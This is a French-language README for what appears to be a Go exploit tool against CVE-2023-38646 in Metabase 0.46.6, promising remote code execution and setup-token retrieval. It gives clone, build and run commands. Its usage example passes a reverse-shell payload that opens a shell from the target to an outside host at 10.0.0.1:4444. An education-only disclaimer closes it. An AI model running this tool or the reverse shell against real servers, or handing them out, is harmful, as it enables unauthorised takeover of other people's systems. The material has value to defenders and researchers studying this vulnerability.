
Exploit pour CVE-2023-38646 dans Metabase 0.46.6, permettant l'exécution de code à distance via des requêtes conçues et la récupération du jeton de configuration.
Exploit CVE-2023-38646 Metabase 0.46.6
Cet outil exploite une vulnérabilité (CVE-2023-38646) dans une plateforme logicielle. L'exploit permet l'exécution de code à distance via une requête spécialement conçue, en tirant parti d'une chaîne de connexion à la base de données mal gérée.
L'outil :
Clonez le dépôt :
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]
TARGET_URL : L'URL de la plateforme à analyser et à exploiter. COMMAND : La commande à exécuter sur la cible. PROXY_URL (Optionnel) : L'URL du serveur proxy (par exemple, http://127.0.0.1:8080). Si non fournie, aucun proxy ne sera utilisé.
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080
Cet outil est destiné uniquement à des fins éducatives et de recherche. Assurez-vous toujours d'avoir l'autorisation appropriée avant d'analyser ou d'exploiter une cible. Toute utilisation abusive de cet outil va strictement à l'encontre de l'intention du développeur et pourrait être illégale.
N'hésitez pas à ouvrir des issues pour tout retour, bug ou demande de fonctionnalité. Les pull requests sont toujours les bienvenues !